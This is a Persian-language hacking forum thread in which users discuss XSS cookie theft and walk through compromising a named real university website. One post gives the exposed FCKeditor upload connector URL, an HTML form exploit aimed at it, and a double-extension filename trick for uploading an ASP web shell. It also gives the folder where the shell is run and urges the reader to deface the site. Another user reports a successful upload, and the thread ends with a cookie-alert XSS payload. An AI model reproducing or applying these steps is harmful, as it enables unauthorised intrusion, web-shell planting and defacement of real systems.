01-23-2012، 12:40 AM
01-23-2012، 12:47 AM
ببینید باید باگ xss تو قسمت نظرات باشه اون که من مثال زدم یه تست بود توی قسمت نظرات باید باشه وقتی ادمین پیغامو دید کوکیشو زد نه اینجوری
این سایت باگ های خیلی بیشتر از xss داره !
این سایت باگ های خیلی بیشتر از xss داره !
01-23-2012، 12:50 AM
تو باگ xss ميشه تو اسكريپت ادرس يه تصوير كه قبلا يه جاي ديگه اپلود كرديم رو داد؟
01-23-2012، 12:58 AM
اره حتی میشه هدایتش کرد به یه صفحه دیگه
البته لینک باید مدیر سایت ببینه اونم توضیح میدم
سوالهای دیگه رو تو بخش دیگه بپرسید اگر یر xss دارید.
تارگت رو که دادید اسکن کنید خیلی باگ داره
البته لینک باید مدیر سایت ببینه اونم توضیح میدم
سوالهای دیگه رو تو بخش دیگه بپرسید اگر یر xss دارید.
تارگت رو که دادید اسکن کنید خیلی باگ داره
01-23-2012، 03:20 AM
اینم از سایت شما
http://jjs.uestc.edu.cn/upload/file/3014...1917_n.jpg
خوابم میاد حوصله ترتیبشو دادن ندارم
http://jjs.uestc.edu.cn/upload/file/3014...1917_n.jpg
خوابم میاد حوصله ترتیبشو دادن ندارم
01-23-2012، 11:07 AM
ممنون . میشه بگید این کار رو چطوری کردید؟ با کدوم باگش ؟ من اسکنش کردم و 7 تا باگ داشت. با کدومش شد عکستون رو بریزید؟ روشش رو هم بگید. ببخشید 3 نمره داره باید روشش رو بلد باشم .جبران میکنم
01-23-2012، 12:46 PM
چطوری جبران میکنی ؟ :d (شوخی)
وب سایتو اسکن کردم یه fckeditor داشت لعنتی سایت که نبود همه fckeditor هاش خراب بود.
بعد اگر توجه کنی به اسکنر ادرس زیر رو میده
بعد از طریق خود fckeditor هم نمیشد چیزی اپلود کنی پس راه حل چی بود ؟
به کد زیر توجه کن
notepad رو باز کن کدهای زیر رو داخلش کپی کن و به اسم parvin.html ذخیره کن
کد :
حالا فایل parvin.html رو اجرا کن !
حالا میتونی شل و یا عکستو اپلود کنی باید یه شل پیدا کنی که شناسایی نشه و پاک نشه اپلود کن و دیفیس بزن حالشو ببر
کارشو زودی تمام کن تا کس دیگه ترتیبشو نداده این سایت ها افت کلاسه که هکشون کنم :-)
هر وقت خواستی shell اپلود کنی اسمشو به این نام تغییر بده
فایل شل رو وقتی اپلود کردی تو این پوشه پیدا کن و اجراش کن
به همین راحتی و به همین باحالی :P
وب سایتو اسکن کردم یه fckeditor داشت لعنتی سایت که نبود همه fckeditor هاش خراب بود.
بعد اگر توجه کنی به اسکنر ادرس زیر رو میده
کد:
http://jjs.uestc.edu.cn:80/FCKeditor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/بعد از طریق خود fckeditor هم نمیشد چیزی اپلود کنی پس راه حل چی بود ؟
به کد زیر توجه کن
notepad رو باز کن کدهای زیر رو داخلش کپی کن و به اسم parvin.html ذخیره کن
کد :
کد:
<strong>parsicoders File Uploader Exploit In FCKeditor</strong>
<form enctype="multipart/form-data" action="
http://jjs.uestc.edu.cn:80/FCKeditor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/"
method="post">
<input name="NewFile" type="file">
<input type="submit" value="submit">
</form>حالا میتونی شل و یا عکستو اپلود کنی باید یه شل پیدا کنی که شناسایی نشه و پاک نشه اپلود کن و دیفیس بزن حالشو ببر
کارشو زودی تمام کن تا کس دیگه ترتیبشو نداده این سایت ها افت کلاسه که هکشون کنم :-)
هر وقت خواستی shell اپلود کنی اسمشو به این نام تغییر بده
کد:
parvin.asp;.jpgفایل شل رو وقتی اپلود کردی تو این پوشه پیدا کن و اجراش کن
کد:
http://jjs.uestc.edu.cn/upload/fileبه همین راحتی و به همین باحالی :P
01-23-2012، 03:29 PM
مرسي
کد:
http://jjs.uestc.edu.cn/upload/file/PPPP.JPG01-23-2012، 03:31 PM
(01-23-2012، 03:29 PM)parvin نوشته: [ -> ]مرسي
کد:http://jjs.uestc.edu.cn/upload/file/PPPP.JPG
استادتون همین سایته رو داده ؟
اگر داده همین کافیه چون fckeditor اپلودش رو bypass شده
بگرد یه شل پیدا کن کلا دیفیس بزن :d
06-08-2012، 12:43 AM
امین جان اگه به جای ساختن اون فای و اپلودش از این دستور استفاده کنیم نتیجه فرق میکنه!
اگه نه حس میکنم این ورش خیلی راحتتر باشه!
کد:
<script>alert(document.cookie)</script>